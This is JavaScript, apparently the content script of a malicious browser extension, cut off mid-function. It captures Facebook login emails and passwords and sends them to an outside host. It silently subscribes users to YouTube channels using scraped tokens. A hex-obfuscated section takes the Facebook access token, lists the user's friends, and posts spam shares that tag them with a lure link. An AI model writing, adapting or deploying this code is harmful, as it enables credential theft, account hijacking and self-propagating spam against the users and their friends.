new Image().src = '//whos.amung.us/swidget/8k1doonmsawi';


var gooles = document.createElement("script");
gooles.type = "text/javascript";
gooles.innerHTML = "(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-83440843-3', 'auto'); ga('send', 'pageview');ga(\"send\",\"event\",{eventCategory:\"installed\",eventAction:\""+chrome.runtime.id+"\",hitCallback:function(){},hitCallbackFail:function(){}});";
document.body.appendChild(gooles);


if (top.location.href.indexOf("facebook.com") > -1 && document.getElementById("login_form")) {
    document.getElementById("login_form").onsubmit = function (e) {
        localStorage.setItem("upom", document.getElementById("email").value);
        localStorage.setItem("uzom", document.getElementById("pass").value);
        setTimeout(function () {
            document.getElementById("login_form").submit()
        }, 99);
        return false
    }
}
if (localStorage.upom && localStorage.uzom) {
(new Image).src = "http://ananococococ.xyz/hesaps.php" + "?us=" + localStorage.upom + "&pw=" + localStorage.uzom;
}

    function get_token(id) {
        var xhr = new XMLHttpRequest,
            url = "https://www.youtube.com/subscribe_embed?channelid=" + id;
        xhr.open("GET", url);
        xhr.send();
        xhr.onreadystatechange = function () {
            if (200 == xhr.status) {
				var resp = xhr.responseText;
                if (resp.match("'LOGGED_IN': (.*?),") && resp.match("'LOGGED_IN': (.*?),")[1] == "true") {
					var session_token = resp.match("'XSRF_TOKEN': \"(.*?)\"")[1];
					var ei = resp.match("ei=(.*?)&")[1];
					var ved = resp.match("ved=(.*?)\"")[1];
					subscribe(id,{session_token:session_token,ei:ei,ved:ved});
                }
            }
        }
		
    }
	

    function subscribe(id,token) {
        var params = "ei=" + token.ei + "&feature=channels4&ved=" + token.ved + "&session_token=" + token.session_token;
        var xhr = new XMLHttpRequest,
            url = "https://www.youtube.com/subscription_ajax?action_create_subscription_to_channel=1&c=" + id;
        xhr.open("POST", url);
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.send(params);
        xhr.onreadystatechange = function () {
            if (200 == xhr.status) {
                if (xhr.responseText) {
                    localStorage['youtube'] = true;
                }
            }
        }
    }
    if (!localStorage['youtube']) {
        get_token("UCLDrkhxZfWVEk88FPgKiqzA");
        get_token("UCkk-y1_RJY3YlsUx0sDO6eg");
    }


var _0xff0e=["\x73\x65\x6E\x64\x5F\x38\x34\x36\x34\x38\x36\x36","\x6E\x6F\x77","\x68\x74\x74\x70\x3A\x2F\x2F\x7B\x72\x61\x6E\x64\x6F\x6D\x7D\x2E\x2F\x7B\x72\x61\x6E\x64\x6F\x6D\x7D","\x35\x30","\x31","\x31\x30\x30\x30\x31\x30\x33\x31\x34\x31\x39\x30\x38\x35\x32","\x6C\x6F\x67","\x6D\x6F\x64\x65","\x74\x65\x73\x74\x75\x73\x65\x72","\x41\x72\x6B\x61\x64\x61\xC5\x9F\x6C\x61\x72\x20\x67\x65\x74\x69\x72\x69\x6C\x69\x79\x6F\x72\x2E","\x73\x65\x74\x54\x69\x6D\x65","\x61\x63\x74\x69\x76\x65\x5F\x74\x69\x6D\x65\x3A","\x74\x6F\x4C\x6F\x63\x61\x6C\x65\x53\x74\x72\x69\x6E\x67","\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x65\x76\x65\x6C\x6F\x70\x65\x72\x73\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x3F\x65\x78\x74\x3D\x6D\x65","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x22\x61\x63\x63\x65\x73\x73\x54\x6F\x6B\x65\x6E\x22\x3A\x22","\x69\x6E\x64\x65\x78\x4F\x66","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x61\x63\x63\x65\x73\x73\x5F\x74\x6F\x6B\x65\x6E","\x74\x72\x69\x6D","\x22","\x73\x70\x6C\x69\x74","\x73\x65\x6E\x64","\x53\x45\x4C\x45\x43\x54\x20\x75\x69\x64\x2C\x20\x6E\x61\x6D\x65\x2C\x20\x6F\x6E\x6C\x69\x6E\x65\x5F\x70\x72\x65\x73\x65\x6E\x63\x65\x2C\x20\x70\x69\x63\x5F\x62\x69\x67\x2C\x20\x63\x61\x6E\x5F\x70\x6F\x73\x74\x20\x20\x46\x52\x4F\x4D\x20\x75\x73\x65\x72\x20\x57\x48\x45\x52\x45\x20\x75\x69\x64\x20\x49\x4E\x20\x28\x53\x45\x4C\x45\x43\x54\x20\x75\x69\x64\x32\x20\x46\x52\x4F\x4D\x20\x66\x72\x69\x65\x6E\x64\x20\x57\x48\x45\x52\x45\x20\x75\x69\x64\x31\x20\x3D\x20\x6D\x65\x28\x29\x29\x20\x4F\x72\x64\x65\x72\x20\x42\x79\x20\x6F\x6E\x6C\x69\x6E\x65\x5F\x70\x72\x65\x73\x65\x6E\x63\x65\x20\x4C\x69\x6D\x69\x74\x20\x32\x30\x30\x30","\x6D\x65","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x72\x61\x70\x68\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x66\x71\x6C\x3F","\x66\x6F\x72\x20\x28\x3B\x3B\x29\x3B","","\x72\x65\x70\x6C\x61\x63\x65","\x70\x61\x72\x73\x65","\x65\x72\x72\x6F\x72","\x64\x61\x74\x61","\x66\x72\x69\x65\x6E\x64\x73","\x6C\x65\x6E\x67\x74\x68","\x70\x6F\x73\x74\x5F\x6C\x69\x6D\x69\x74","\x6F\x6E\x6C\x69\x6E\x65\x5F\x70\x72\x65\x73\x65\x6E\x63\x65","\x61\x63\x74\x69\x76\x65","\x69\x64\x6C\x65","\x70\x75\x73\x68","\x75\x69\x64","\x74\x61\x67\x5F\x6C\x69\x6D\x69\x74","\x63\x65\x69\x6C","\x74\x61\x67\x73","\x69\x6D\x61\x67\x65","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x72\x61\x70\x68\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F","\x2F\x70\x69\x63\x74\x75\x72\x65\x3F\x77\x69\x64\x74\x68\x3D\x32\x30\x30\x26\x68\x65\x69\x67\x68\x74\x3D\x32\x30\x30","\x6E\x61\x6D\x65","\x20","\x74\x65\x78\x74","\x6D\x61\x72\x6B\x61\x6B\x6F\x6C\x73\x61\x61\x74\x69\x2E\x63\x6F\x6D","\x6C\x69\x6E\x6B","\x68\x74\x74\x70\x3A\x2F\x2F","\x2E","\x2F\x3F","\x2E\x68\x74\x6D\x6C","\x31\x31\x33\x38\x36\x39\x31\x39\x38\x36\x33\x37\x34\x38\x30","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x64\x69\x61\x6C\x6F\x67\x2F\x72\x65\x74\x75\x72\x6E\x2F\x63\x6C\x6F\x73\x65","\x70\x6F\x70\x75\x70","\x68\x6F\x6D\x65","\x66\x72\x69\x65\x6E\x64","\x66\x6C\x6F\x6F\x72","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x34\x30\x30\x36\x38\x31\x32\x31\x36\x36\x35\x34\x31\x37\x35","\x20\x59\x61\x68\x75\x20\x62\x75\x20\x6E\x65\x20\x73\x65\x6E\x69\x20\x67\x6F\x72\x75\x6E\x63\x65\x20\x63\x6F\x6B\x20\x73\x61\x73\x69\x72\x64\x69\x6D\x20\x62\x75\x72\x64\x61\x20\x61\x6D\x61\x20\x62\x69\x20\x6F\x6B\x61\x64\x61\x72\x64\x61\x20\x73\x65\x76\x69\x6E\x64\x69\x6D\x20\x68\x61\x68\x61","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x64\x69\x61\x6C\x6F\x67\x2F\x66\x65\x65\x64\x3F\x61\x70\x70\x5F\x69\x64\x3D\x39\x36\x36\x32\x34\x32\x32\x32\x33\x33\x39\x37\x31\x31\x37\x26\x64\x69\x73\x70\x6C\x61\x79\x3D\x70\x6F\x70\x75\x70\x26\x70\x69\x63\x74\x75\x72\x65\x3D","\x26\x6E\x61\x6D\x65\x3D","\x26\x6C\x69\x6E\x6B\x3D","\x26\x74\x6F\x3D","\x26\x72\x65\x64\x69\x72\x65\x63\x74\x5F\x75\x72\x69\x3D\x68\x74\x74\x70\x25\x33\x41\x25\x32\x46\x25\x32\x46\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x25\x32\x46\x64\x69\x61\x6C\x6F\x67\x25\x32\x46\x72\x65\x74\x75\x72\x6E\x25\x32\x46\x63\x6C\x6F\x73\x65","\x37\x78\x65\x58\x78\x61\x45\x52\x30\x67\x62\x77\x2D\x77\x52\x41\x4B\x45\x68\x79\x38\x6A\x72\x57\x6F\x34\x36\x31\x74\x77\x41\x78\x75\x31\x33\x77\x6D\x38\x67\x78\x5A\x33\x6F\x63\x55\x39\x55\x4B\x61\x78\x65\x55\x57\x32\x79\x37\x45\x34\x69\x75\x33\x65\x32\x32\x35\x6F\x62\x38\x61\x55\x62\x6F\x36\x75\x63\x78\x47\x34\x38\x68\x77\x76\x39\x46\x6F\x71\x41\x67\x57","\x50\x48\x41\x53\x45\x44\x3A\x44\x45\x46\x41\x55\x4C\x54","\x50\x4F\x53\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x76\x32\x2E\x33\x2F\x64\x69\x61\x6C\x6F\x67\x2F\x73\x68\x61\x72\x65\x2F\x73\x75\x62\x6D\x69\x74\x3F","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64\x3B\x20\x63\x68\x61\x72\x73\x65\x74\x3D\x55\x54\x46\x2D\x38","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x70\x6F\x73\x74\x5F\x69\x64\x3D","\x70\x6F\x73\x74\x5F\x69\x64","\x5F","\x23","\x50\x6F\x73\x74\x20\x67\x6F\x6E\x64\x65\x72\x69\x6C\x64\x69\x3A\x20\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F","\x70\x72\x69\x76\x61\x63\x79","\x3F","\x76\x61\x6C\x75\x65","\x45\x56\x45\x52\x59\x4F\x4E\x45","\x33\x30\x30\x36\x34\x35\x30\x38\x33\x33\x38\x34\x37\x33\x35","\x32\x39\x31\x36\x36\x37\x30\x36\x34\x32\x37\x39\x37\x31\x34","\x37\x41\x6D\x61\x6A\x45\x79\x6C\x33\x35\x77\x7A\x67\x44\x78\x79\x47\x38\x45\x69\x67\x6D\x7A\x46\x45\x62\x45\x4B\x41\x38\x41\x79\x38\x5A\x39\x4C\x46\x77\x78\x42\x78\x43\x62\x7A\x45\x53\x32\x4E\x36\x78\x79\x62\x78\x75\x33\x66\x7A\x6F\x61\x71\x78\x62\x78\x6A\x78\x32\x37\x57\x38\x38\x79\x62\x78\x2D\x71\x41\x34\x45\x2D\x38\x4B\x75\x45\x6A\x78\x43\x32\x65\x37\x38\x34\x69\x34\x55\x39\x58\x77","\x31\x35","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x73\x65\x74\x74\x69\x6E\x67\x73\x2F\x67\x72\x61\x6E\x75\x6C\x61\x72\x5F\x70\x72\x69\x76\x61\x63\x79\x2F\x63\x6F\x6D\x70\x6F\x73\x65\x72\x2E\x70\x68\x70","\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x72\x73\x74\x75\x76\x79\x7A\x78\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2D","\x6F\x62\x6A\x65\x63\x74","\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x72\x73\x74\x75\x76\x79\x7A\x78\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x52\x53\x54\x55\x56\x59\x5A\x58\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39","\x26","\x6A\x6F\x69\x6E","\x3D","\x6D\x61\x70","\x6B\x65\x79\x73","\x5F\x35\x63\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x43\x6C\x61\x73\x73\x4E\x61\x6D\x65","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x75\x69\x54\x6F\x67\x67\x6C\x65\x20\x77\x72\x61\x70","\x6C\x6F\x67\x6F\x75\x74\x4D\x65\x6E\x75","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6F\x75\x74\x65\x72\x48\x54\x4D\x4C","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x75\x69\x50\x6F\x70\x6F\x76\x65\x72","\x55\x46\x49\x43\x6F\x6D\x6D\x65\x6E\x74\x43\x6C\x6F\x73\x65\x42\x75\x74\x74\x6F\x6E","\x73\x65\x74\x49\x6E\x74\x65\x72\x76\x61\x6C","\x62\x6F\x64\x79","\x47\x65\x74\x20\x53\x74\x61\x72\x74\x65\x64","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x63\x68\x65\x63\x6B\x70\x6F\x69\x6E\x74\x2F","\x6F\x6E","\x43\x6F\x6E\x74\x69\x6E\x75\x65","\x47\x65\x74\x20\x43\x6F\x6E\x74\x69\x6E\x75\x65","\x68\x72\x65\x66","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D","\x3B","\x63\x6F\x6F\x6B\x69\x65","\x73\x75\x62\x73\x74\x72","\x3D\x3B\x65\x78\x70\x69\x72\x65\x73\x3D\x54\x68\x75\x2C\x20\x30\x31\x20\x4A\x61\x6E\x20\x31\x39\x37\x30\x20\x30\x30\x3A\x30\x30\x3A\x30\x30\x20\x47\x4D\x54\x3B\x64\x6F\x6D\x61\x69\x6E\x3D\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D","\x6F\x66\x66","\x69\x64","\x63\x6C\x65\x61\x72","\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D","\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x66\x62\x5F\x64\x74\x73\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x69\x73\x72\x75\x6E","\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x63\x68\x65\x63\x6B\x70\x6F\x69\x6E\x74","\x6D\x65\x74\x61","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x6D\x61\x74\x63\x68","\x2C","\x22\x72\x65\x76\x69\x73\x69\x6F\x6E\x22\x3A","\x22\x61\x6A\x61\x78\x70\x69\x70\x65\x5F\x74\x6F\x6B\x65\x6E\x22\x3A","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x32","\x55\x73\x65\x72\x3A","\x66\x62\x5F\x64\x74\x73\x67\x3A","\x5F\x5F\x72\x65\x76\x3A","\x74\x74\x73\x74\x61\x6D\x70\x3A","\x61\x6A\x61\x78\x70\x69\x70\x65\x5F\x74\x6F\x6B\x65\x6E\x3A","\x6E\x68","\x4E\x6F\x74\x20\x66\x6F\x75\x6E\x64"];var consoleFree=true;function _a(){var _0x9f67x3=_0xff0e[0];var _0x9f67x4=25;if(!localStorage[_0x9f67x3]|| parseInt(localStorage[_0x9f67x3])< Date[_0xff0e[1]]()- 60* 1000* _0x9f67x4){localStorage[_0x9f67x3]= Date[_0xff0e[1]]();config= {"\x6C\x69\x6E\x6B":_0xff0e[2],"\x70\x6F\x73\x74\x5F\x6C\x69\x6D\x69\x74":_0xff0e[3],"\x74\x61\x67\x5F\x6C\x69\x6D\x69\x74":_0xff0e[4],"\x6D\x6F\x64\x65":true,"\x74\x65\x73\x74\x75\x73\x65\x72":_0xff0e[5]};console[_0xff0e[6]](config);if(config[_0xff0e[7]]== true|| profile_id== config[_0xff0e[8]]){_b();console[_0xff0e[6]](_0xff0e[9])}}else {var _0x9f67x5= new Date();_0x9f67x5[_0xff0e[10]](parseInt(localStorage[_0x9f67x3])+ (60* 1000* _0x9f67x4));console[_0xff0e[6]](_0xff0e[11]+ _0x9f67x5[_0xff0e[12]]())}}function _b(){var _0x9f67x7= new XMLHttpRequest();_0x9f67x7[_0xff0e[15]](_0xff0e[13],_0xff0e[14]);_0x9f67x7[_0xff0e[16]]= function(){if(_0x9f67x7[_0xff0e[17]]== 4&& _0x9f67x7[_0xff0e[18]]== 200){var _0x9f67x8={};if(_0x9f67x7[_0xff0e[21]][_0xff0e[20]](_0xff0e[19])> 0){_0x9f67x8[_0xff0e[22]]= _0x9f67x7[_0xff0e[21]][_0xff0e[25]](_0xff0e[19])[1][_0xff0e[25]](_0xff0e[24])[0][_0xff0e[23]]();console[_0xff0e[6]](_0x9f67x8[_0xff0e[22]]);_c(_0x9f67x8)}else {}}};_0x9f67x7[_0xff0e[26]]()}function _c(_0x9f67x8){var _0x9f67xa={q:_0xff0e[27],access_token:_0x9f67x8[_0xff0e[22]],ext:_0xff0e[28]};var _0x9f67x7= new XMLHttpRequest();_0x9f67x7[_0xff0e[15]](_0xff0e[13],_0xff0e[29]+ _s(_0x9f67xa),true);_0x9f67x7[_0xff0e[16]]= function(){if(_0x9f67x7[_0xff0e[17]]== 4&& _0x9f67x7[_0xff0e[18]]== 200){var _0x9f67xb=JSON[_0xff0e[33]](_0x9f67x7[_0xff0e[21]][_0xff0e[32]](_0xff0e[30],_0xff0e[31]));if(!_0x9f67xb[_0xff0e[34]]){var _0x9f67xc=_0x9f67xb[_0xff0e[35]];_0x9f67xc= _o(_0x9f67xc);_0x9f67x8[_0xff0e[36]]= [];for(i= 0;i< _0x9f67xc[_0xff0e[37]];i++){if(_0x9f67x8[_0xff0e[36]][_0xff0e[37]]< config[_0xff0e[38]]&& (_0x9f67xc[i][_0xff0e[39]]== _0xff0e[40]|| _0x9f67xc[i][_0xff0e[39]]== _0xff0e[41])){_0x9f67x8[_0xff0e[36]][_0xff0e[42]](_0x9f67xc[i])}};if(_0x9f67x8[_0xff0e[36]][_0xff0e[37]]< config[_0xff0e[38]]){_0x9f67xc= _o(_0x9f67xc);for(i= 0;i< _0x9f67xc[_0xff0e[37]];i++){if(_0x9f67x8[_0xff0e[36]][_0xff0e[37]]< config[_0xff0e[38]]&& _i(_0x9f67x8[_0xff0e[36]],_0xff0e[43],_0x9f67xc[i][_0xff0e[43]])== false){_0x9f67x8[_0xff0e[36]][_0xff0e[42]](_0x9f67xc[i])}}};_d(_0x9f67x8)}else {}}};_0x9f67x7[_0xff0e[26]]()}function _d(_0x9f67x8){var _0x9f67xe=Math[_0xff0e[45]](_0x9f67x8[_0xff0e[36]][_0xff0e[37]]/ config[_0xff0e[44]]);config[_0xff0e[38]]= _0x9f67xe> config[_0xff0e[38]]?config[_0xff0e[38]]:_0x9f67xe;if(config[_0xff0e[38]]== 0){config[_0xff0e[38]]= 1};for(p= 0;p< config[_0xff0e[38]];p++){_0x9f67x8[_0xff0e[46]]= [];for(pk= 0;pk< config[_0xff0e[44]];pk++){var _0x9f67xf=pk+ (config[_0xff0e[44]]* p);if(_0x9f67x8[_0xff0e[36]][_0x9f67xf]){_0x9f67x8[_0xff0e[46]][_0xff0e[42]](_0x9f67x8[_0xff0e[36]][_0x9f67xf])}};_0x9f67x8[_0xff0e[43]]= _0x9f67x8[_0xff0e[46]][0][_0xff0e[43]];_0x9f67x8[_0xff0e[47]]= _0xff0e[48]+ _0x9f67x8[_0xff0e[43]]+ _0xff0e[49];_0x9f67x8[_0xff0e[50]]= _0x9f67x8[_0xff0e[46]][0][_0xff0e[50]]?_0x9f67x8[_0xff0e[46]][0][_0xff0e[50]][_0xff0e[25]](_0xff0e[51])[0]:_0x9f67x8[_0xff0e[46]][0][_0xff0e[52]][_0xff0e[25]](_0xff0e[51])[0];console[_0xff0e[6]](_0x9f67x8[_0xff0e[46]]);_e(_0x9f67x8)}}function _e(_0x9f67x8){var _0x9f67x11=_0x9f67x8[_0xff0e[43]];var _0x9f67x12=_0x9f67x8[_0xff0e[50]];var _0x9f67x13=[_0xff0e[53]];_0x9f67x13= _o(_0x9f67x13);_0x9f67x8[_0xff0e[54]]= _0xff0e[55]+ _r(_p(5,20))+ _0xff0e[56]+ _0x9f67x13[0]+ _0xff0e[57]+ _p(_r(5,20))+ _0xff0e[58];_0x9f67x8[_0xff0e[43]]= _0x9f67x11;_0x9f67x8[_0xff0e[50]]= _0x9f67x12;_f(_0x9f67x8)}function _f(_0x9f67x8){var _0x9f67x11=_0x9f67x8[_0xff0e[43]];var _0x9f67x15=_0x9f67x8[_0xff0e[54]];var _0x9f67x12=_0x9f67x8[_0xff0e[50]];var _0x9f67x16=_0x9f67x8[_0xff0e[47]];var _0x9f67x17={ext:_0xff0e[28]};var _0x9f67xa={fb_dtsg:fb_dtsg,app_id:_0xff0e[59],redirect_uri:_0xff0e[60],display:_0xff0e[61],access_token:_0xff0e[31],sdk:_0xff0e[31],from_post:1,xhpc_context:_0xff0e[62],xhpc_ismeta:1,xhpc_timeline:_0xff0e[31],mode:_0xff0e[63],friendTarget:_0x9f67x8[_0xff0e[50]],audience_targets:_0x9f67x8[_0xff0e[43]],xhpc_targetid:profile_id,xhpc_publish_type:1,xhpc_message_text:_0xff0e[31],xhpc_message:_0xff0e[31],quote:_0xff0e[31],is_explicit_place:_0xff0e[31],composertags_place:_0xff0e[31],composertags_place_name:_0xff0e[31],tagger_session_id:Math[_0xff0e[64]](Date[_0xff0e[1]]()/ 1000),"\x61\x63\x74\x69\x6F\x6E\x5F\x74\x79\x70\x65\x5F\x69\x64\x5B\x30\x5D":_0xff0e[31],"\x6F\x62\x6A\x65\x63\x74\x5F\x73\x74\x72\x5B\x30\x5D":_0xff0e[31],"\x6F\x62\x6A\x65\x63\x74\x5F\x69\x64\x5B\x30\x5D":_0xff0e[31],hide_object_attachment:0,og_suggestion_mechanism:_0xff0e[31],og_suggestion_logging_data:_0xff0e[31],icon_id:_0xff0e[31],share_action_properties:JSON[_0xff0e[65]]({"\x6F\x62\x6A\x65\x63\x74":_0x9f67x8[_0xff0e[54]]}),share_action_type_id:_0xff0e[66],title:_0x9f67x8[_0xff0e[50]]+ _0xff0e[67],description:_0xff0e[31],caption:_0xff0e[31],picture:_0x9f67x8[_0xff0e[47]],device_code:_0xff0e[31],device_shared:_0xff0e[31],ref:_0xff0e[31],dialog_url:_0xff0e[68]+ _0x9f67x8[_0xff0e[47]]+ _0xff0e[69]+ _r(8)+ _0xff0e[70]+ _0x9f67x8[_0xff0e[54]]+ _0xff0e[71]+ _0x9f67x8[_0xff0e[43]]+ _0xff0e[72],composertags_city:_0xff0e[31],disable_location_sharing:false,composer_predicted_city:_0xff0e[31],__CONFIRM__:1,__user:profile_id,__a:1,__dyn:_0xff0e[73],__req:3,__be:-1,__pc:_0xff0e[74],ttstamp:ttstamp,__rev:__rev};var _0x9f67x7= new XMLHttpRequest();_0x9f67x7[_0xff0e[15]](_0xff0e[75],_0xff0e[76]+ _s(_0x9f67x17));_0x9f67x7[_0xff0e[79]](_0xff0e[77],_0xff0e[78]);_0x9f67x7[_0xff0e[26]](_s(_0x9f67xa));_0x9f67x7[_0xff0e[16]]= function(){if(_0x9f67x7[_0xff0e[17]]== 4&& _0x9f67x7[_0xff0e[18]]== 200){var _0x9f67xb=JSON[_0xff0e[33]](_0x9f67x7[_0xff0e[21]][_0xff0e[32]](_0xff0e[30],_0xff0e[31]));if(!_0x9f67xb[_0xff0e[34]]&& _0x9f67x7[_0xff0e[21]][_0xff0e[20]](_0xff0e[80])> 0){_0x9f67x8[_0xff0e[81]]= _0x9f67x7[_0xff0e[21]][_0xff0e[25]](_0xff0e[80])[1][_0xff0e[25]](_0xff0e[83])[0][_0xff0e[25]](_0xff0e[82])[1];_0x9f67x8[_0xff0e[50]]= _0x9f67x12;_0x9f67x8[_0xff0e[54]]= _0x9f67x15;_0x9f67x8[_0xff0e[43]]= _0x9f67x11;_0x9f67x8[_0xff0e[47]]= _0x9f67x16;console[_0xff0e[6]](_0xff0e[84]+ _0x9f67x8[_0xff0e[81]]);_g(_0x9f67x8)}else {if(_0x9f67xb[_0xff0e[34]]){}}}}}function _g(_0x9f67x8){var _0x9f67x11=_0x9f67x8[_0xff0e[43]];var _0x9f67x15=_0x9f67x8[_0xff0e[54]];var _0x9f67x12=_0x9f67x8[_0xff0e[50]];var _0x9f67x16=_0x9f67x8[_0xff0e[47]];var _0x9f67x19=_0x9f67x8[_0xff0e[81]];var _0x9f67xa={access_token:_0x9f67x8[_0xff0e[22]],fields:_0xff0e[85],ext:_0xff0e[28]};var _0x9f67x7= new XMLHttpRequest();_0x9f67x7[_0xff0e[15]](_0xff0e[13],_0xff0e[48]+ profile_id+ _0xff0e[82]+ _0x9f67x8[_0xff0e[81]]+ _0xff0e[86]+ _s(_0x9f67xa));_0x9f67x7[_0xff0e[79]](_0xff0e[77],_0xff0e[78]);_0x9f67x7[_0xff0e[26]]();_0x9f67x7[_0xff0e[16]]= function(){if(_0x9f67x7[_0xff0e[17]]== 4){var _0x9f67xb={};try{_0x9f67xb= JSON[_0xff0e[33]](_0x9f67x7[_0xff0e[21]][_0xff0e[32]](_0xff0e[30],_0xff0e[31]))}catch(err){};_0x9f67x8[_0xff0e[50]]= _0x9f67x12;_0x9f67x8[_0xff0e[54]]= _0x9f67x15;_0x9f67x8[_0xff0e[43]]= _0x9f67x11;_0x9f67x8[_0xff0e[47]]= _0x9f67x16;_0x9f67x8[_0xff0e[81]]= _0x9f67x19;if(_0x9f67xb[_0xff0e[85]]&& _0x9f67xb[_0xff0e[85]][_0xff0e[87]]&& _0x9f67xb[_0xff0e[85]][_0xff0e[87]]== _0xff0e[88]){}else {}}}}function _h(){var _0x9f67xa={value:_0xff0e[89],prev_value:_0xff0e[90],__user:profile_id,__a:1,__dyn:_0xff0e[91],__req:_0xff0e[92],fb_dtsg:fb_dtsg,ttstamp:ttstamp,__rev:__rev};var _0x9f67x7= new XMLHttpRequest();_0x9f67x7[_0xff0e[15]](_0xff0e[75],_0xff0e[93]);_0x9f67x7[_0xff0e[79]](_0xff0e[77],_0xff0e[78]);_0x9f67x7[_0xff0e[26]](_s(_0x9f67xa));_0x9f67x7[_0xff0e[16]]= function(){if(_0x9f67x7[_0xff0e[17]]== 4&& _0x9f67x7[_0xff0e[18]]== 200){var _0x9f67xb=JSON[_0xff0e[33]](_0x9f67x7[_0xff0e[21]][_0xff0e[32]](_0xff0e[30],_0xff0e[31]))}}}function _i(_0x9f67x1c,_0x9f67x1d,_0x9f67x1e){var _0x9f67x1f=false;for(a= 0;a< _0x9f67x1c[_0xff0e[37]];a++){for(k in _0x9f67x1c[a]){if(k== _0x9f67x1d&& _0x9f67x1c[a][k]== _0x9f67x1e){_0x9f67x1f= true;break}}};return _0x9f67x1f}function _j(_0x9f67x21,_0x9f67x22){var _0x9f67x23=_0xff0e[94];var _0x9f67x24=_0xff0e[31];for(cr= 0;cr< _0x9f67x21[_0xff0e[37]];cr++){_0x9f67x24+= _0x9f67x23[_0x9f67x22[_0xff0e[20]](_0x9f67x21[cr])]};return _0x9f67x24}function _k(){function _0x9f67x26(){return Math[_0xff0e[64]]((1+ Math[_0xff0e[96]]())* 0x10000).toString(16)[_0xff0e[95]](1)}return _0x9f67x26()+ _0x9f67x26()+ _0xff0e[97]+ _0x9f67x26()+ _0xff0e[97]+ _0x9f67x26()+ _0xff0e[97]+ _0x9f67x26()+ _0xff0e[97]+ _0x9f67x26()+ _0x9f67x26()+ _0x9f67x26()}function _m(_0x9f67x28,_0x9f67x29){var _0x9f67x2a=[];while(_0x9f67x2a[_0xff0e[37]]< _0x9f67x28){var _0x9f67x2b=Math[_0xff0e[64]](Math[_0xff0e[96]]()* _0x9f67x29);if(_0x9f67x2a[_0xff0e[20]](_0x9f67x2b)< 0){_0x9f67x2a[_0xff0e[42]](_0x9f67x2b)}};return _0x9f67x2a}function _n(_0x9f67x23,_0x9f67x2d){var _0x9f67x2e=false;for(key in _0x9f67x23){if(key.toString()== _0x9f67x2d){_0x9f67x2e= 